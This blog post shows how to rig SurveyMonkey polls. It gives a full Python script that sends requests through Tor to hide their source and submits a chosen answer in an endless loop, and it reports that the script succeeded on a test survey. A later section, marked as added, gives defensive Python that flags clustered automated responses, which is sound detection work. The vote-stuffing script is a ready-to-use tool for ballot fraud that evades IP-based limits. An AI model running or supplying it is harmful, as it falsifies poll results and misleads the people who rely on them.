Survey Monkey has no captcha, beware

Survey Monkey is used for surveys, so you want the results to be real.

This post shows how easy it would be to vote fraudulently and manipulate poll results.

For this example, I will be using Python with its mechanize module and Tor installed on Linux. You will also need Firefox with the TamperData plugin.

First, I created a test survey.


Next, I will find out the post data using TamperData.


The important data has been highlighted. The input name on the left is the name of the form element for the “What is my name?” question, and the number corresponding to it on the far right is the answer I picked, “billy”. The rest of the post data consists of hidden fields and tokens that identify the response.

With this information, it’s easy to put together a script to automate the submission of the survey. Below is the commented code for the example submission.

http://pastebay.net/1203480

#!/usr/bin/env python
#SurveyMonkey needs captcha
import mechanize
import socks
import socket
#patch to use Tor, code from Stack Overflow, not mine
def create_connection(address, timeout=None, source_address=None):
    sock = socks.socksocket()
    sock.connect(address)
    return sock

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
socket.socket = socks.socksocket
socket.create_connection = create_connection
count = 0
while True:
    br = mechanize.Browser()# Open the browser object
    br.addheaders = [('User-agent', ' Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')]
    br.open('http://www.surveymonkey.com/s/AAAAA') # survey to test
    br.select_form(nr=0)
    #What is my name?
    br.form.set_value(['6024902055_0'],name='input_518253276_10_0_0')
    #Drop down you say selection c
    br.form.set_value(['6024902970'],name='input_518253330_50_6024902966_6024902967')
    #Tell me about yourself
    text = "testing 123" # text for the form
    br.form.set_value(text,name='text_518253292_0')
    br.submit()#submit the form
    print br.response().read()#print the response
    count+=1
    print "Number of votes: "+ str(count) # print number of votes

The script worked as expected and billy was the most popular name.
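
A defender's view of the same traffic, as an added example that is not from the original post: the script above replays one User-Agent, one set of answers and one free-text string, so responses can be clustered on those fields rather than on source IP, which Tor changes. The records, field layout, window and threshold below are constructed assumptions, not SurveyMonkey data or its API.

```python
from collections import defaultdict

# Constructed sample responses: (time in seconds, source IP, User-Agent,
# chosen answers, free-text answer). Not real survey data.
SAMPLE = [
    (0,   "198.51.100.7",  "UA-A", ("billy", "c"), "testing 123"),
    (4,   "203.0.113.9",   "UA-A", ("billy", "c"), "testing 123"),
    (9,   "192.0.2.44",    "UA-A", ("billy", "c"), "Testing  123"),
    (13,  "198.51.100.23", "UA-A", ("billy", "c"), "testing 123"),
    (40,  "192.0.2.80",    "UA-B", ("anna", "a"),  "I like cycling"),
    (900, "192.0.2.81",    "UA-C", ("billy", "b"), "Hello from Leeds"),
]

def fingerprint(rec):
    """Key on what a replayed form post keeps constant. The IP is left out
    because a proxy such as Tor changes it between requests."""
    _, _, agent, answers, text = rec
    return (agent, answers, " ".join(text.lower().split()))

def flag_bursts(records, window=60, threshold=3):
    """Return {fingerprint: sorted timestamps} for every fingerprint with at
    least `threshold` submissions inside some `window`-second span."""
    by_fp = defaultdict(list)
    for rec in records:
        by_fp[fingerprint(rec)].append(rec[0])
    flagged = {}
    for fp, times in by_fp.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                flagged[fp] = times
                break
    return flagged

def clean_tally(records, flagged):
    """Tally the first answer, leaving out every response in a flagged cluster."""
    tally = defaultdict(int)
    for rec in records:
        if fingerprint(rec) not in flagged:
            tally[rec[3][0]] += 1
    return dict(tally)

if __name__ == "__main__":
    suspects = flag_bursts(SAMPLE)
    print(suspects)
    print(clean_tally(SAMPLE, suspects))
```

Flagged clusters are candidates for review rather than proof of fraud, since genuine respondents can share a browser and give identical short answers.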